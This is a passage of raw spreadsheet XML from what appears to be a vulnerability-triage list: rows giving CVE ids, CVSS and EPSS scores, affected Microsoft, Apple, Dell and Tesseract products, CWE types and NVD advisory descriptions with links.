          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70564</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K455"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455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr"/>
      <c r="Q455" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70569</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K456" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr"/>
      <c r="Q456" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R456" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71334</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K457"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457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr"/>
      <c r="Q457" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77500</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K458"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458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr"/>
      <c r="Q458" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80166</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr"/>
      <c r="Q459" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Privilege Management vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="S459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80166</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84497</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos</t>
        </is>
      </c>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr"/>
      <c r="Q460" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R460" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow was addressed with improved size validation. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27. Opening a maliciously crafted file may lead to unexpected process termination.</t>
        </is>
      </c>
      <c r="S460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84497</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84505</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr"/>
      <c r="Q461" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R461" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to gain root privileges.</t>
        </is>
      </c>
      <c r="S461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84505</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84506</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr"/>
      <c r="Q462" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R462" s="5" t="inlineStr">
        <is>
          <t>A use after free issue was addressed with improved memory management. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to execute arbitrary code with kernel privileges.</t>
        </is>
      </c>
      <c r="S462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84506</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84511</t>
        </is>
      </c>
      <c r="D463" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F463" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr"/>
      <c r="Q463" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R463" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted asset catalog may lead to unexpected process termination.</t>
        </is>
      </c>
      <c r="S463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84511</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84515</t>
        </is>
      </c>
      <c r="D464" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F464" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr"/>
      <c r="Q464" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R464" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Connecting to a malicious SMB server may lead to kernel memory corruption.</t>
        </is>
      </c>
      <c r="S464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84515</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84575</t>
        </is>
      </c>
      <c r="D465" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F465" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr"/>
      <c r="Q465" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R465" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted file may lead to unexpected app termination.</t>
        </is>
      </c>
      <c r="S465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84575</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84607</t>
        </is>
      </c>
      <c r="D466" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F466" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr"/>
      <c r="Q466" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R466" s="5" t="inlineStr">
        <is>
          <t>A race condition was addressed with improved state management. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. A sandboxed app may be able to execute arbitrary code with kernel privileges.</t>
        </is>
      </c>
      <c r="S466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84607</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85892</t>
        </is>
      </c>
      <c r="D467" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F467" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr"/>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr"/>
      <c r="Q467" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R467" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Microsoft Edge (Chromium-based) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85892</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88051</t>
        </is>
      </c>
      <c r="D468" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr">
        <is>
          <t>tesseract-ocr:tesseract_ocr</t>
        </is>
      </c>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr"/>
      <c r="Q468" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R468" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, the callback form of GenericVector::read in src/ccutil/genericvector.h reads the independent int32 fields reserved and size_used_ from a .traineddata model without a cap or an invariant check. reserve(reserved) allocates the backing array, but the callback loop writes size_used_ elements. A crafted TESSDATA_INTTEMP component with version_id 4 or later can therefore set reserved to a small value and size_used_ to a large value when fontinfo_table_.read(fp, read_info) is called from src/classify/intproto.cpp, causing a heap out-of-bounds write of FontInfo structures, heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="S468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88051</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88052</t>
        </is>
      </c>
      <c r="D469" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F469" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr">
        <is>
          <t>tesseract-ocr:tesseract_ocr</t>
        </is>
      </c>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr"/>
      <c r="Q469" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="R469" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, UNICHARSET::load_via_fgets in src/ccutil/unicharset.cpp trusts the declared unichar count as a loop bound and uses id as an unchecked index into the unichars vector. unichar_insert_backwards_compatible can leave the vector unchanged for an empty, duplicate, or already-encodable representation, causing id to become larger than unichars.size(). Subsequent set_* calls and the write to unichars[id].properties.enabled then write UNICHAR_PROPERTIES beyond the vector during initialization in both the default LSTM and legacy engines, causing heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="S469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88052</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88053</t>
        </is>
      </c>
      <c r="D470" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr">
        <is>
          <t>tesseract-ocr:tesseract_ocr</t>
        </is>
      </c>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr"/>
      <c r="Q470" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R470" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, Classify::ReadIntTemplates in src/classify/intproto.cpp reads NumClassPruners, NumClasses, and NumProtoSets from the TESSDATA_INTTEMP component of a crafted .traineddata file and uses those values as loop bounds without validating them against MAX_NUM_CLASS_PRUNERS, MAX_NUM_CLASSES, and MAX_NUM_PROTO_SETS. The loops store heap pointers into fixed-capacity ClassPruners and ProtoSets arrays in INT_TEMPLATES_STRUCT and INT_CLASS_STRUCT, so an oversized count causes heap out-of-bounds pointer writes during legacy-classifier initialization before OCR begins, resulting in heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="S470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88053</t>
        </is>
      </c>
    </row>
    <row r="471">
